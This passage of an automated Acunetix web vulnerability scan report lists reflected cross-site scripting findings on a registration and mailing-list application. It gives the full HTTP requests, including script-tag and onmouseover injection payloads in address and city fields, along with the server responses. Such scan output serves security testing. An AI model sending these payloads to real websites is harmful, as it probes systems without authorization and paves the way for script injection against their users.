<td colspan="19" class="s43">GET /yuliana/email/addToEmailList?emailAddress=&amp;firstName=&amp;lastName=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28924441%29%3c%2fScRiPt%3e HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:68px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Length: 199<br>Date: Sun, 26 Feb 2012 03:17:55 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input address1 was set to &quot; onmouseover=prompt(932861) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=%22%20onmouseover%3dprompt%28932861%29%20bad%3d%22&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=tktbotms&amp;lastName=ldvmiyic&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:45 GMT<br>Content-Length: 14681</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input address1 was set to &quot; onmouseover=prompt(939384) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:28px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">8</td>
</tr>
</table>
<a name="PageN9"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:209px">
<td colspan="19" class="s43">Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br> <br>address1=%22%20onmouseover%3dprompt%28939384%29%20bad%3d%22&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=lajitjth&amp;lastName=vdqevqkq&amp;password=ac</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:45 GMT<br>Content-Length: 14681</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input address1 was set to &quot; onmouseover=prompt(971043) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 366<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=%22%20onmouseover%3dprompt%28971043%29%20bad%3d%22&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=03&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=teocknpo&amp;lastName=teocknpo&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:45 GMT<br>Content-Length: 14681</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input address1 was set to &quot; onmouseover=prompt(977007) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:115px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 366<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">9</td>
</tr>
</table>
<a name="PageN10"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:120px">
<td colspan="19" class="s43">User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br> <br>address1=%22%20onmouseover%3dprompt%28977007%29%20bad%3d%22&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:44 GMT<br>Content-Length: 14681</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input address1 was set to &quot; onmouseover=prompt(988839) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 366<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=%22%20onmouseover%3dprompt%28988839%29%20bad%3d%22&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=02&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=teocknpo&amp;lastName=teocknpo&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:44 GMT<br>Content-Length: 14681</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input address2 was set to &quot; onmouseover=prompt(903637) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:204px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 366<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br> <br>address1=3137 Laguna Street&amp;address2=%22%20onmouseover%3dprompt%28903637%29%20bad%3d%22&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpir</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">10</td>
</tr>
</table>
<a name="PageN11"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:31px">
<td colspan="19" class="s43">ationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:46 GMT<br>Content-Length: 14681</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input address2 was set to &quot; onmouseover=prompt(929100) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137%20Laguna%20Street&amp;address2=%22%20onmouseover%3dprompt%28929100%29%20bad%3d%22&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=tktbotms&amp;lastName=ldvmiyic&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:47 GMT<br>Content-Length: 14681</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input address2 was set to &quot; onmouseover=prompt(934176) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137%20Laguna%20Street&amp;address2=%22%20onmouseover%3dprompt%28934176%29%20bad%3d%22&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=lajitjth&amp;lastName=vdqevqkq&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:43px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">11</td>
</tr>
</table>
<a name="PageN12"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:45px">
<td colspan="19" class="s43">Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:48 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input address2 was set to &quot; onmouseover=prompt(955999) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 366<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=%22%20onmouseover%3dprompt%28955999%29%20bad%3d%22&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=02&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=cefrapbb&amp;lastName=cefrapbb&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:47 GMT<br>Content-Length: 14681</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input address2 was set to &quot; onmouseover=prompt(900136) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 366<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=%22%20onmouseover%3dprompt%28900136%29%20bad%3d%22&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=03&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=cefrapbb&amp;lastName=cefrapbb&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:47 GMT<br>Content-Length: 14681</td>
</tr>
<tr style="height:47px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">12</td>
</tr>
</table>
<a name="PageN13"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input city was set to &quot; onmouseover=prompt(933771) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 383<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=%22%20onmouseover%3dprompt%28933771%29%20bad%3d%22&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=tktbotms&amp;lastName=ldvmiyic&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:50 GMT<br>Content-Length: 14686</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input city was set to &quot; onmouseover=prompt(940129) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 383<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=%22%20onmouseover%3dprompt%28940129%29%20bad%3d%22&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=lajitjth&amp;lastName=vdqevqkq&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:50 GMT<br>Content-Length: 14686</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input city was set to &quot; onmouseover=prompt(948549) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:1px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">13</td>
</tr>
</table>
<a name="PageN14"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 371<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br> <br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=%22%20onmouseover%3dprompt%28948549%29%20bad%3d%22&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=03&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=fnegeuow&amp;lastName=fnegeuow&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:49 GMT<br>Content-Length: 14686</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input city was set to &quot; onmouseover=prompt(920862) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 371<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=%22%20onmouseover%3dprompt%28920862%29%20bad%3d%22&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=fnegeuow&amp;lastName=fnegeuow&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:49 GMT<br>Content-Length: 14686</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input city was set to &quot; onmouseover=prompt(956217) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:74px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 371<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">14</td>
</tr>
</table>
<a name="PageN15"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
